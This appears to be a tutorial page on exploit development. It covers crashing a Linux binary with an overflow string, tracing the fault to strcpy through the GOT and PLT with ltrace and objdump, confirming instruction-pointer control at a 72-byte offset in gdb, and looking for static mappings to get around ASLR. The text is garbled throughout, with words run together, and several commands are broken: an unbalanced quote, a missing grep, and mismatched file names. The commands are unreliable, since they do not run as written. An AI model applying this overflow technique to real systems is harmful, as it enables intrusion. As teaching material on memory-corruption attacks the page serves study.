ROP Finding the vulnerable function
At this point you have been able to generate a crash on a linux binary. We now need to find the vulnerable function before progressing
# creating the crash
python3 -c 'print("A"*100) > temp.txt
./binary file.txt
Segmentation faultuse
ltraceto see if there is a function that is causing the crash
ltrace ./binary file.txt 2>&1 | grep SIGSEGV -B1
7120-strcpy(0x6fff3b10, "AAAAAAAAAAAAAAAAAA"...) = 0x2ffff108b
--snip--we can see that
strcpyis the issue here causing the crashuse
objdumpto see where in the code segmentstrcpy()is called.Look at the GOT of the program and grep for
strcpy()Then use the
objdumptool to specifically query the.pltsegment to see where the address in the GOT is referenced.After attaining the address use
objdumptool once more and change the segment to.textand grep on the address shown in the PLT
objdump -R ./binary | grep strcpy
0304b00a R_386_JUMP_SLOT strcpy
objdump -j .plt -d binary | grep b00a
70482b7: ff 25 0a b0 04 03 jmp *0x0304b00a
objdump -j .text -d binary | 82b7 -B2 -A2
# you will see the vuln buffer size
# the address of strcpy@plt
# and a ret which is a good spot for a break to see
# if your payload was successfully copied into mem to validate your finding see if your buffer analysis was correct (72)
python3 -c print("A"*72 + "BBBB") > temp.txt
gdb ./binary
run temp.txt
Program recieved signal SIGSEGV, Segmentation fault
0x42424242 in ?? ()Find static addresses
We need to find static memory locations as ASLR will be enabled on modern systems.
There may be static regions that do not utilize ASLR
There could be static mappings due to any third party programs that get mapped into our program
use
ltraceto find the static mappings
ltrace ./binary file.txt 2>&1 | egrep -i 'mmap|open'look for any shared object that is mmap into the binary
should see an open() call followed by a mmap() with a memory address passed into mmap()
Last updated